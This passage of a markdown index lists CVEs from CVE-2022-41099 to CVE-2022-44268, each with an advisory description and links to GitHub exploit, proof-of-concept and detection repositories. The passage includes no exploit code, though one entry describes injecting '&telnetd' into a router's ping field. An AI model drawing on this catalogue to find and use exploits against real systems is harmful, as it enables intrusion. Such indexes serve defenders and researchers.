- [g-gill24/WinRE-Patch](https://github.com/g-gill24/WinRE-Patch)
- [dsn1321/KB5025175-CVE-2022-41099](https://github.com/dsn1321/KB5025175-CVE-2022-41099)
### CVE-2022-41114 (2022-11-09)
Windows Bind Filter Driver Elevation of Privilege Vulnerability
- [gmh5225/CVE-2022-41114](https://github.com/gmh5225/CVE-2022-41114)
### CVE-2022-41218 (2022-09-21)
In drivers/media/dvb-core/dmxdev.c in the Linux kernel through 5.19.10, there is a use-after-free caused by refcount races, affecting dvb_demux_open and dvb_dmxdev_release.
- [Tobey123/CVE-2022-41218](https://github.com/Tobey123/CVE-2022-41218)
### CVE-2022-41220 (2022-09-21)
md2roff 1.9 has a stack-based buffer overflow via a Markdown file, a different vulnerability than CVE-2022-34913. NOTE: the vendor's position is that the product is not intended for untrusted input
- [Halcy0nic/CVE-2022-41220](https://github.com/Halcy0nic/CVE-2022-41220)
### CVE-2022-41272 (2022-12-13)
An unauthenticated attacker over the network can attach to an open interface exposed through JNDI by the User Defined Search (UDS) of SAP NetWeaver Process Integration (PI) - version 7.50 and make use of an open naming and directory API to access services which can be used to perform unauthorized operations affecting users and data across the entire system. This allows the attacker to have full read access to user data, make limited modifications to user data, and degrade the performance of the system, leading to a high impact on confidentiality and a limited impact on the availability and integrity of the application.\n
- [redrays-io/CVE-2022-41272](https://github.com/redrays-io/CVE-2022-41272)
### CVE-2022-41333 (2023-03-07)
An uncontrolled resource consumption vulnerability [CWE-400] in FortiRecorder version 6.4.3 and below, 6.0.11 and below login authentication mechanism may allow an unauthenticated attacker to make the device unavailable via crafted GET requests.
- [polar0x/CVE-2022-41333](https://github.com/polar0x/CVE-2022-41333)
### CVE-2022-41343 (2022-09-25)
registerFont in FontMetrics.php in Dompdf before 2.0.1 allows remote file inclusion because a URI validation failure does not halt font registration, as demonstrated by a @font-face rule.
- [BKreisel/CVE-2022-41343](https://github.com/BKreisel/CVE-2022-41343)
### CVE-2022-41352 (2022-09-26)
An issue was discovered in Zimbra Collaboration (ZCS) 8.8.15 and 9.0. An attacker can upload arbitrary files through amavis via a cpio loophole (extraction to /opt/zimbra/jetty/webapps/zimbra/public) that can lead to incorrect access to any other user accounts. Zimbra recommends pax over cpio. Also, pax is in the prerequisites of Zimbra on Ubuntu; however, pax is no longer part of a default Red Hat installation after RHEL 6 (or CentOS 6). Once pax is installed, amavis automatically prefers it over cpio.
- [segfault-it/cve-2022-41352](https://github.com/segfault-it/cve-2022-41352)
- [Cr4ckC4t/cve-2022-41352-zimbra-rce](https://github.com/Cr4ckC4t/cve-2022-41352-zimbra-rce)
- [lolminerxmrig/cve-2022-41352-zimbra-rce-1](https://github.com/lolminerxmrig/cve-2022-41352-zimbra-rce-1)
- [qailanet/cve-2022-41352-zimbra-rce](https://github.com/qailanet/cve-2022-41352-zimbra-rce)
### CVE-2022-41358 (2022-10-20)
A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.
- [thecasual/CVE-2022-41358](https://github.com/thecasual/CVE-2022-41358)
### CVE-2022-41401 (2023-08-04)
OpenRefine <= v3.5.2 contains a Server-Side Request Forgery (SSRF) vulnerability, which permits unauthorized users to exploit the system, potentially leading to unauthorized access to internal resources and sensitive file disclosure.
- [ixSly/CVE-2022-41401](https://github.com/ixSly/CVE-2022-41401)
### CVE-2022-41412 (2022-11-30)
An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.
- [renmizo/CVE-2022-41412](https://github.com/renmizo/CVE-2022-41412)
### CVE-2022-41413 (2022-11-30)
perfSONAR v4.x <= v4.4.5 was discovered to contain a Cross-Site Request Forgery (CSRF) which is triggered when an attacker injects crafted input into the Search function.
- [renmizo/CVE-2022-41413](https://github.com/renmizo/CVE-2022-41413)
### CVE-2022-41445 (2022-11-22)
A cross-site scripting (XSS) vulnerability in Record Management System using CodeIgniter 1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Add Subject page.
- [RashidKhanPathan/CVE-2022-41445](https://github.com/RashidKhanPathan/CVE-2022-41445)
### CVE-2022-41446 (2022-11-23)
An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data.
- [RashidKhanPathan/CVE-2022-41446](https://github.com/RashidKhanPathan/CVE-2022-41446)
### CVE-2022-41540 (2022-10-18)
The web app client of TP-Link AX10v1 V1_211117 uses hard-coded cryptographic keys when communicating with the router. Attackers who are able to intercept the communications between the web client and router through a man-in-the-middle attack can then obtain the sequence key via a brute-force attack, and access sensitive information.
- [efchatz/easy-exploits](https://github.com/efchatz/easy-exploits)
### CVE-2022-41544 (2022-10-18)
GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.
- [yosef0x01/CVE-2022-41544](https://github.com/yosef0x01/CVE-2022-41544)
- [h3xcr4ck3r/CVE-2022-41544](https://github.com/h3xcr4ck3r/CVE-2022-41544)
### CVE-2022-41622 (2022-12-07)
In all versions, \n\nBIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. \n\nNote: Software versions which have reached End of Technical Support (EoTS) are not evaluated.\n\n
- [rbowes-r7/refreshing-soap-exploit](https://github.com/rbowes-r7/refreshing-soap-exploit)
### CVE-2022-41717 (2022-12-08)
An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.
- [domdom82/h2conn-exploit](https://github.com/domdom82/h2conn-exploit)
### CVE-2022-41741 (2022-10-19)
NGINX Open Source before versions 1.23.2 and 1.22.1, NGINX Open Source Subscription before versions R2 P1 and R1 P1, and NGINX Plus before versions R27 P1 and R26 P1 have a vulnerability in the module ngx_http_mp4_module that might allow a local attacker to corrupt NGINX worker memory, resulting in its termination or potential other impact using a specially crafted audio or video file. The issue affects only NGINX products that are built with the ngx_http_mp4_module, when the mp4 directive is used in the configuration file. Further, the attack is possible only if an attacker can trigger processing of a specially crafted audio or video file with the module ngx_http_mp4_module.
- [dumbbutt0/evilMP4](https://github.com/dumbbutt0/evilMP4)
### CVE-2022-41828 (2022-09-29)
In Amazon AWS Redshift JDBC Driver (aka amazon-redshift-jdbc-driver or redshift-jdbc42) before 2.1.0.8, the Object Factory does not check the class type when instantiating an object from a class name.
- [murataydemir/CVE-2022-41828](https://github.com/murataydemir/CVE-2022-41828)
### CVE-2022-41852
- [Warxim/CVE-2022-41852](https://github.com/Warxim/CVE-2022-41852)
- [xpectomas/CVE-2022-41852-Disable](https://github.com/xpectomas/CVE-2022-41852-Disable)
### CVE-2022-41853 (2022-10-06)
Those using java.sql.Statement or java.sql.PreparedStatement in hsqldb (HyperSQL DataBase) to process untrusted input may be vulnerable to a remote code execution attack. By default it is allowed to call any static method of any Java class in the classpath resulting in code execution. The issue can be prevented by updating to 2.7.1 or by setting the system property "hsqldb.method_class_names" to classes which are allowed to be called. For example, System.setProperty("hsqldb.method_class_names", "abc") or Java argument -Dhsqldb.method_class_names="abc" can be used. From version 2.7.1 all classes by default are not accessible except those in java.lang.Math and need to be manually enabled.
- [mbadanoiu/CVE-2022-41853](https://github.com/mbadanoiu/CVE-2022-41853)
### CVE-2022-41876 (2022-11-10)
ezplatform-graphql is a GraphQL server implementation for Ibexa DXP and Ibexa Open Source. Versions prior to 2.3.12 and 1.0.13 are subject to Insecure Storage of Sensitive Information. Unauthenticated GraphQL queries for user accounts can expose password hashes of users that have created or modified content, typically administrators and editors. This issue has been patched in versions 2.3.12, and 1.0.13 on the 1.X branch. Users unable to upgrade can remove the "passwordHash" entry from "src/bundle/Resources/config/graphql/User.types.yaml" in the GraphQL package, and other properties like hash type, email, login if you prefer.
- [Skileau/CVE-2022-41876](https://github.com/Skileau/CVE-2022-41876)
### CVE-2022-41903 (2023-01-17)
Git is distributed revision control system. `git log` can display commits in an arbitrary format using its `--format` specifiers. This functionality is also exposed to `git archive` via the `export-subst` gitattribute. When processing the padding operators, there is a integer overflow in `pretty.c::format_and_pad_commit()` where a `size_t` is stored improperly as an `int`, and then added as an offset to a `memcpy()`. This overflow can be triggered directly by a user running a command which invokes the commit formatting machinery (e.g., `git log --format=...`). It may also be triggered indirectly through git archive via the export-subst mechanism, which expands format specifiers inside of files within the repository during a git archive. This integer overflow can result in arbitrary heap writes, which may result in arbitrary code execution. The problem has been patched in the versions published on 2023-01-17, going back to v2.30.7. Users are advised to upgrade. Users who are unable to upgrade should disable `git archive` in untrusted repositories. If you expose git archive via `git daemon`, disable it by running `git config --global daemon.uploadArch false`.
- [sondermc/git-cveissues](https://github.com/sondermc/git-cveissues)
### CVE-2022-41923 (2022-11-23)
Grails Spring Security Core plugin is vulnerable to privilege escalation. The vulnerability allows an attacker access to one endpoint (i.e. the targeted endpoint) using the authorization requirements of a different endpoint (i.e. the donor endpoint). In some Grails framework applications, access to the targeted endpoint will be granted based on meeting the authorization requirements of the donor endpoint, which can result in a privilege escalation attack. This vulnerability has been patched in grails-spring-security-core versions 3.3.2, 4.0.5 and 5.1.1. Impacted Applications: Grails Spring Security Core plugin versions: 1.x 2.x >=3.0.0 <3.3.2 >=4.0.0 <4.0.5 >=5.0.0 <5.1.1 We strongly suggest that all Grails framework applications using the Grails Spring Security Core plugin be updated to a patched release of the plugin. Workarounds: Users should create a subclass extending one of the following classes from the `grails.plugin.springsecurity.web.access.intercept` package, depending on their security configuration: * `AnnotationFilterInvocationDefinition` * `InterceptUrlMapFilterInvocationDefinition` * `RequestmapFilterInvocationDefinition` In each case, the subclass should override the `calculateUri` method like so: ``` @Override protected String calculateUri(HttpServletRequest request) { UrlPathHelper.defaultInstance.getRequestUri(request) } ``` This should be considered a temporary measure, as the patched versions of grails-spring-security-core deprecates the `calculateUri` method. Once upgraded to a patched version of the plugin, this workaround is no longer needed. The workaround is especially important for version 2.x, as no patch is available version 2.x of the GSSC plugin.
- [grails/GSSC-CVE-2022-41923](https://github.com/grails/GSSC-CVE-2022-41923)
### CVE-2022-41966 (2022-12-27)
XStream serializes Java objects to XML and back again. Versions prior to 1.4.20 may allow a remote attacker to terminate the application with a stack overflow error, resulting in a denial of service only via manipulation the processed input stream. The attack uses the hash code implementation for collections and maps to force recursive hash calculation causing a stack overflow. This issue is patched in version 1.4.20 which handles the stack overflow and raises an InputManipulationException instead. A potential workaround for users who only use HashMap or HashSet and whose XML refers these only as default map or set, is to change the default implementation of java.util.Map and java.util per the code example in the referenced advisory. However, this implies that your application does not care about the implementation of the map and all elements are comparable.
- [111ddea/Xstream_cve-2022-41966](https://github.com/111ddea/Xstream_cve-2022-41966)
### CVE-2022-42045 (2023-07-13)
Certain Zemana products are vulnerable to Arbitrary code injection. This affects Watchdog Anti-Malware 4.1.422 and Zemana AntiMalware 3.2.28.
- [ReCryptLLC/CVE-2022-42045](https://github.com/ReCryptLLC/CVE-2022-42045)
### CVE-2022-42046 (2022-12-20)
wfshbr64.sys and wfshbr32.sys specially crafted IOCTL allows arbitrary user to perform local privilege escalation
- [kkent030315/CVE-2022-42046](https://github.com/kkent030315/CVE-2022-42046)
### CVE-2022-42094 (2022-11-22)
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the 'Card' content.
- [bypazs/CVE-2022-42094](https://github.com/bypazs/CVE-2022-42094)
### CVE-2022-42095 (2022-11-23)
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Page content.
- [bypazs/CVE-2022-42095](https://github.com/bypazs/CVE-2022-42095)
### CVE-2022-42096 (2022-11-21)
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via Post content.
- [bypazs/CVE-2022-42096](https://github.com/bypazs/CVE-2022-42096)
### CVE-2022-42097 (2022-11-22)
Backdrop CMS version 1.23.0 was discovered to contain a stored cross-site scripting (XSS) vulnerability via 'Comment.' .
- [bypazs/CVE-2022-42097](https://github.com/bypazs/CVE-2022-42097)
### CVE-2022-42098 (2022-11-22)
KLiK SocialMediaWebsite version v1.0.1 is vulnerable to SQL Injection via the profile.php.
- [bypazs/CVE-2022-42098](https://github.com/bypazs/CVE-2022-42098)
### CVE-2022-42176 (2022-10-20)
In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access.
- [soy-oreocato/CVE-2022-42176](https://github.com/soy-oreocato/CVE-2022-42176)
### CVE-2022-42475 (2023-01-02)
A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.
- [bryanster/ioc-cve-2022-42475](https://github.com/bryanster/ioc-cve-2022-42475)
- [scrt/cve-2022-42475](https://github.com/scrt/cve-2022-42475)
- [Amir-hy/cve-2022-42475](https://github.com/Amir-hy/cve-2022-42475)
- [Mustafa1986/cve-2022-42475-Fortinet](https://github.com/Mustafa1986/cve-2022-42475-Fortinet)
- [3yujw7njai/CVE-2022-42475-RCE-POC](https://github.com/3yujw7njai/CVE-2022-42475-RCE-POC)
- [natceil/cve-2022-42475](https://github.com/natceil/cve-2022-42475)
- [0xhaggis/CVE-2022-42475](https://github.com/0xhaggis/CVE-2022-42475)
### CVE-2022-42703 (2022-10-09)
mm/rmap.c in the Linux kernel before 5.19.7 has a use-after-free related to leaf anon_vma double reuse.
- [Squirre17/hbp-attack-demo](https://github.com/Squirre17/hbp-attack-demo)
- [Satheesh575555/linux-4.1.15_CVE-2022-42703](https://github.com/Satheesh575555/linux-4.1.15_CVE-2022-42703)
### CVE-2022-42864 (2022-12-15)
A race condition was addressed with improved state handling. This issue is fixed in tvOS 16.2, macOS Monterey 12.6.2, macOS Ventura 13.1, macOS Big Sur 11.7.2, iOS 15.7.2 and iPadOS 15.7.2, iOS 16.2 and iPadOS 16.2, watchOS 9.2. An app may be able to execute arbitrary code with kernel privileges.
- [Muirey03/CVE-2022-42864](https://github.com/Muirey03/CVE-2022-42864)
### CVE-2022-42889 (2022-10-13)
Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpolation is "${prefix:name}", where "prefix" is used to locate an instance of org.apache.commons.text.lookup.StringLookup that performs the interpolation. Starting with version 1.5 and continuing through 1.9, the set of default Lookup instances included interpolators that could result in arbitrary code execution or contact with remote servers. These lookups are: - "script" - execute expressions using the JVM script execution engine (javax.script) - "dns" - resolve dns records - "url" - load values from urls, including from remote servers Applications using the interpolation defaults in the affected versions may be vulnerable to remote code execution or unintentional contact with remote servers if untrusted configuration values are used. Users are recommended to upgrade to Apache Commons Text 1.10.0, which disables the problematic interpolators by default.
- [SeanWrightSec/CVE-2022-42889-PoC](https://github.com/SeanWrightSec/CVE-2022-42889-PoC)
- [chainguard-dev/text4shell-policy](https://github.com/chainguard-dev/text4shell-policy)
- [tulhan/commons-text-goat](https://github.com/tulhan/commons-text-goat)
- [karthikuj/cve-2022-42889-text4shell-docker](https://github.com/karthikuj/cve-2022-42889-text4shell-docker)
- [ClickCyber/cve-2022-42889](https://github.com/ClickCyber/cve-2022-42889)
- [korteke/CVE-2022-42889-POC](https://github.com/korteke/CVE-2022-42889-POC)
- [rockmelodies/CVE-2022-42889](https://github.com/rockmelodies/CVE-2022-42889)
- [eunomie/cve-2022-42889-check](https://github.com/eunomie/cve-2022-42889-check)
- [kljunowsky/CVE-2022-42889-text4shell](https://github.com/kljunowsky/CVE-2022-42889-text4shell)
- [securekomodo/text4shell-scan](https://github.com/securekomodo/text4shell-scan)
- [neerazz/CVE-2022-42889](https://github.com/neerazz/CVE-2022-42889)
- [uk0/cve-2022-42889-intercept](https://github.com/uk0/cve-2022-42889-intercept)
- [securekomodo/text4shell-poc](https://github.com/securekomodo/text4shell-poc)
- [humbss/CVE-2022-42889](https://github.com/humbss/CVE-2022-42889)
- [stavrosgns/Text4ShellPayloads](https://github.com/stavrosgns/Text4ShellPayloads)
- [s3l33/CVE-2022-42889](https://github.com/s3l33/CVE-2022-42889)
- [galoget/CVE-2022-42889-Text4Shell-Docker](https://github.com/galoget/CVE-2022-42889-Text4Shell-Docker)
- [rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC](https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC)
- [akshayithape-devops/CVE-2022-42889-POC](https://github.com/akshayithape-devops/CVE-2022-42889-POC)
- [0xmaximus/Apache-Commons-Text-CVE-2022-42889](https://github.com/0xmaximus/Apache-Commons-Text-CVE-2022-42889)
- [smileostrich/Text4Shell-Scanner](https://github.com/smileostrich/Text4Shell-Scanner)
- [cxzero/CVE-2022-42889-text4shell](https://github.com/cxzero/CVE-2022-42889-text4shell)
- [west-wind/CVE-2022-42889](https://github.com/west-wind/CVE-2022-42889)
- [Vulnmachines/text4shell-CVE-2022-42889](https://github.com/Vulnmachines/text4shell-CVE-2022-42889)
- [Gotcha-1G/CVE-2022-42889](https://github.com/Gotcha-1G/CVE-2022-42889)
- [cryxnet/CVE-2022-42889-RCE](https://github.com/cryxnet/CVE-2022-42889-RCE)
- [sunnyvale-it/CVE-2022-42889-PoC](https://github.com/sunnyvale-it/CVE-2022-42889-PoC)
- [QAInsights/cve-2022-42889-jmeter](https://github.com/QAInsights/cve-2022-42889-jmeter)
- [adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889](https://github.com/adarshpv9746/Text4shell--Automated-exploit---CVE-2022-42889)
- [pwnb0y/Text4shell-exploit](https://github.com/pwnb0y/Text4shell-exploit)
- [gokul-ramesh/text4shell-exploit](https://github.com/gokul-ramesh/text4shell-exploit)
- [f0ng/text4shellburpscanner](https://github.com/f0ng/text4shellburpscanner)
- [devenes/text4shell-cve-2022-42889](https://github.com/devenes/text4shell-cve-2022-42889)
- [hotblac/text4shell](https://github.com/hotblac/text4shell)
- [necroteddy/CVE-2022-42889](https://github.com/necroteddy/CVE-2022-42889)
- [ReachabilityOrg/cve-2022-42889-text4shell-docker](https://github.com/ReachabilityOrg/cve-2022-42889-text4shell-docker)
- [dgor2023/cve-2022-42889-text4shell-docker](https://github.com/dgor2023/cve-2022-42889-text4shell-docker)
- [Dima2021/cve-2022-42889-text4shell](https://github.com/Dima2021/cve-2022-42889-text4shell)
- [aaronm-sysdig/text4shell-docker](https://github.com/aaronm-sysdig/text4shell-docker)
- [gustanini/CVE-2022-42889-Text4Shell-POC](https://github.com/gustanini/CVE-2022-42889-Text4Shell-POC)
- [Sic4rio/CVE-2022-42889](https://github.com/Sic4rio/CVE-2022-42889)
- [34006133/CVE-2022-42889](https://github.com/34006133/CVE-2022-42889)
- [DimaMend/cve-2022-42889-text4shell](https://github.com/DimaMend/cve-2022-42889-text4shell)
- [joshbnewton31080/cve-2022-42889-text4shell](https://github.com/joshbnewton31080/cve-2022-42889-text4shell)
- [MendDemo-josh/cve-2022-42889-text4shell](https://github.com/MendDemo-josh/cve-2022-42889-text4shell)
### CVE-2022-42896 (2022-11-23)
There are use-after-free vulnerabilities in the Linux kernel's net/bluetooth/l2cap_core.c's l2cap_connect and l2cap_le_connect_req functions which may allow code execution and leaking kernel memory (respectively) remotely via Bluetooth. A remote attacker could execute code leaking kernel memory via Bluetooth if within proximity of the victim.\n\nWe recommend upgrading past commit https://www.google.com/url https://github.com/torvalds/linux/commit/711f8c3fb3db61897080468586b970c87c61d9e4 https://www.google.com/url \n\n
- [Satheesh575555/linux-4.19.72_CVE-2022-42896](https://github.com/Satheesh575555/linux-4.19.72_CVE-2022-42896)
- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_old](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_old)
- [Trinadh465/linux-4.19.72_CVE-2022-42896](https://github.com/Trinadh465/linux-4.19.72_CVE-2022-42896)
- [hshivhare67/kernel_v4.19.72_CVE-2022-42896_new](https://github.com/hshivhare67/kernel_v4.19.72_CVE-2022-42896_new)
- [himanshu667/kernel_v4.19.72_CVE-2022-42896](https://github.com/himanshu667/kernel_v4.19.72_CVE-2022-42896)
### CVE-2022-42899 (2022-10-13)
Bentley MicroStation and MicroStation-based applications may be affected by out-of-bounds read and stack overflow issues when opening crafted SKP files. Exploiting these issues could lead to information disclosure and code execution. The fixed versions are 10.17.01.58* for MicroStation and 10.17.01.19* for Bentley View.
- [iamsanjay/CVE-2022-42899](https://github.com/iamsanjay/CVE-2022-42899)
### CVE-2022-43096 (2022-11-17)
Mediatrix 4102 before v48.5.2718 allows local attackers to gain root access via the UART port.
- [ProxyStaffy/Mediatrix-CVE-2022-43096](https://github.com/ProxyStaffy/Mediatrix-CVE-2022-43096)
### CVE-2022-43097 (2022-12-05)
Phpgurukul User Registration & User Management System v3.0 was discovered to contain multiple stored cross-site scripting (XSS) vulnerabilities via the firstname and lastname parameters of the registration form & login pages.
- [nibin-m/CVE-2022-43097](https://github.com/nibin-m/CVE-2022-43097)
### CVE-2022-43117 (2022-11-21)
Sourcecodester Password Storage Application in PHP/OOP and MySQL 1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the Name, Username, Description and Site Feature parameters.
- [RashidKhanPathan/CVE-2022-43117](https://github.com/RashidKhanPathan/CVE-2022-43117)
### CVE-2022-43143 (2022-11-21)
A cross-site scripting (XSS) vulnerability in Beekeeper Studio v3.6.6 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the error modal container.
- [goseungduk/beekeeper](https://github.com/goseungduk/beekeeper)
### CVE-2022-43144 (2022-11-08)
A cross-site scripting (XSS) vulnerability in Canteen Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
- [mudassiruddin/CVE-2022-43144-Stored-XSS](https://github.com/mudassiruddin/CVE-2022-43144-Stored-XSS)
### CVE-2022-43271 (2022-12-22)
Inhabit Systems Pty Ltd Move CRM version 4, build 260 was discovered to contain a cross-site scripting (XSS) vulnerability via the User profile component.
- [SecurityWillCheck/CVE-2022-43271](https://github.com/SecurityWillCheck/CVE-2022-43271)
### CVE-2022-43293 (2023-04-11)
Wacom Driver 6.3.46-1 for Windows was discovered to contain an arbitrary file write vulnerability via the component \Wacom\Wacom_Tablet.exe.
- [LucaBarile/CVE-2022-43293](https://github.com/LucaBarile/CVE-2022-43293)
### CVE-2022-43332 (2022-11-17)
A cross-site scripting (XSS) vulnerability in Wondercms v3.3.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Site title field of the Configuration Panel.
- [maikroservice/CVE-2022-43332](https://github.com/maikroservice/CVE-2022-43332)
### CVE-2022-43343 (2022-11-08)
N-Prolog v1.91 was discovered to contain a global buffer overflow vulnerability in the function gettoken() at Main.c.
- [Halcy0nic/CVE-2022-43343](https://github.com/Halcy0nic/CVE-2022-43343)
### CVE-2022-43369 (2022-12-06)
AutoTaxi Stand Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component search.php.
- [sudoninja-noob/CVE-2022-43369](https://github.com/sudoninja-noob/CVE-2022-43369)
### CVE-2022-43571 (2022-11-03)
In Splunk Enterprise versions below 8.2.9, 8.1.12, and 9.0.2, an authenticated user can execute arbitrary code through the dashboard PDF generation component.\n\n
- [ohnonoyesyes/CVE-2022-43571](https://github.com/ohnonoyesyes/CVE-2022-43571)
### CVE-2022-43680 (2022-10-24)
In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.
- [Trinadh465/external_expat-2.1.0_CVE-2022-43680](https://github.com/Trinadh465/external_expat-2.1.0_CVE-2022-43680)
- [nidhihcl/external_expat_2.1.0_CVE-2022-43680](https://github.com/nidhihcl/external_expat_2.1.0_CVE-2022-43680)
### CVE-2022-43684 (2023-06-13)
ServiceNow has released patches and an upgrade that address an Access Control List (ACL) bypass issue in ServiceNow Core functionality.\n\n\n\nAdditional Details\n\nThis issue is present in the following supported ServiceNow releases: \n\n\n\n * Quebec prior to Patch 10 Hot Fix 8b\n * Rome prior to Patch 10 Hot Fix 1\n * San Diego prior to Patch 7\n * Tokyo prior to Tokyo Patch 1; and \n * Utah prior to Utah General Availability \n\n\n\n\nIf this ACL bypass issue were to be successfully exploited, it potentially could allow an authenticated user to obtain sensitive information from tables missing authorization controls.\n\n\n\n
- [lolminerxmrig/CVE-2022-43684](https://github.com/lolminerxmrig/CVE-2022-43684)
### CVE-2022-43704 (2023-01-20)
The Sinilink XY-WFT1 WiFi Remote Thermostat, running firmware 1.3.6, allows an attacker to bypass the intended requirement to communicate using MQTT. It is possible to replay Sinilink aka SINILINK521 protocol (udp/1024) commands interfacing directly with the target device. This, in turn, allows for an attack to control the onboard relay without requiring authentication via the mobile application. This might result in an unacceptable temperature within the target device's physical environment.
- [9lyph/CVE-2022-43704](https://github.com/9lyph/CVE-2022-43704)
### CVE-2022-43959 (2023-01-20)
Insufficiently Protected Credentials in the AD/LDAP server settings in 1C-Bitrix Bitrix24 through 22.200.200 allow remote administrators to discover an AD/LDAP administrative password by reading the source code of /bitrix/admin/ldap_server_edit.php.
- [secware-ru/CVE-2022-43959](https://github.com/secware-ru/CVE-2022-43959)
### CVE-2022-43980 (2023-01-27)
There is a stored cross-site scripting vulnerability in Pandora FMS v765 in the network maps editing functionality. An attacker could modify a network map, including on purpose the name of an XSS payload. Once created, if a user with admin privileges clicks on the edited network maps, the XSS payload will be executed. The exploitation of this vulnerability could allow an atacker to steal the value of the admin user´s cookie.
- [Argonx21/CVE-2022-43980](https://github.com/Argonx21/CVE-2022-43980)
### CVE-2022-44118 (2022-11-23)
dedecmdv6 v6.1.9 is vulnerable to Remote Code Execution (RCE) via file_manage_control.php.
- [Athishpranav2003/CVE-2022-44118-Exploit](https://github.com/Athishpranav2003/CVE-2022-44118-Exploit)
### CVE-2022-44136 (2022-11-30)
Zenario CMS 9.3.57186 is vulnerable to Remote Code Excution (RCE).
- [IgorDuino/CVE-2022-44136-exploit](https://github.com/IgorDuino/CVE-2022-44136-exploit)
### CVE-2022-44149 (2023-01-06)
The web service on Nexxt Amp300 ARN02304U8 42.103.1.5095 and 80.103.2.5045 devices allows remote OS command execution by placing &telnetd in the JSON host field to the ping feature of the goform/sysTools component. Authentication is required
- [yerodin/CVE-2022-44149](https://github.com/yerodin/CVE-2022-44149)
- [geniuszlyy/CVE-2022-44149](https://github.com/geniuszlyy/CVE-2022-44149)
### CVE-2022-44183 (2022-11-21)
Tenda AC18 V15.03.05.19 is vulnerable to Buffer Overflow via function formSetWifiGuestBasic.
- [flagqaz/CVE-2022-44183](https://github.com/flagqaz/CVE-2022-44183)
### CVE-2022-44215 (2023-08-22)
There is an open redirect vulnerability in Titan FTP server 19.0 and below. Users are redirected to any target URL.
- [JBalanza/CVE-2022-44215](https://github.com/JBalanza/CVE-2022-44215)
### CVE-2022-44268 (2023-02-06)
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).
- [duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC](https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC)
- [y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment](https://github.com/y1nglamore/CVE-2022-44268-ImageMagick-Vulnerable-Docker-Environment)
- [agathanon/cve-2022-44268](https://github.com/agathanon/cve-2022-44268)
- [jnschaeffer/cve-2022-44268-detector](https://github.com/jnschaeffer/cve-2022-44268-detector)
- [Ashifcoder/CVE-2022-44268-automated-poc](https://github.com/Ashifcoder/CVE-2022-44268-automated-poc)
- [Baikuya/CVE-2022-44268-PoC](https://github.com/Baikuya/CVE-2022-44268-PoC)
- [voidz0r/CVE-2022-44268](https://github.com/voidz0r/CVE-2022-44268)
- [Sybil-Scan/imagemagick-lfi-poc](https://github.com/Sybil-Scan/imagemagick-lfi-poc)
- [Vulnmachines/imagemagick-CVE-2022-44268](https://github.com/Vulnmachines/imagemagick-CVE-2022-44268)
- [kljunowsky/CVE-2022-44268](https://github.com/kljunowsky/CVE-2022-44268)
- [nfm/heroku-CVE-2022-44268-reproduction](https://github.com/nfm/heroku-CVE-2022-44268-reproduction)
- [betillogalvanfbc/POC-CVE-2022-44268](https://github.com/betillogalvanfbc/POC-CVE-2022-44268)
- [adhikara13/CVE-2022-44268-MagiLeak](https://github.com/adhikara13/CVE-2022-44268-MagiLeak)
- [bhavikmalhotra/CVE-2022-44268-Exploit](https://github.com/bhavikmalhotra/CVE-2022-44268-Exploit)
- [entr0pie/CVE-2022-44268](https://github.com/entr0pie/CVE-2022-44268)
- [Pog-Frog/cve-2022-44268](https://github.com/Pog-Frog/cve-2022-44268)
- [narekkay/auto-cve-2022-44268.sh](https://github.com/narekkay/auto-cve-2022-44268.sh)
- [fanbyprinciple/ImageMagick-lfi-poc](https://github.com/fanbyprinciple/ImageMagick-lfi-poc)
- [chairat095/CVE-2022-44268_By_Kyokito](https://github.com/chairat095/CVE-2022-44268_By_Kyokito)
- [atici/Exploit-for-ImageMagick-CVE-2022-44268](https://github.com/atici/Exploit-for-ImageMagick-CVE-2022-44268)
- [Vagebondcur/IMAGE-MAGICK-CVE-2022-44268](https://github.com/Vagebondcur/IMAGE-MAGICK-CVE-2022-44268)
- [NataliSemi/-CVE-2022-44268](https://github.com/NataliSemi/-CVE-2022-44268)
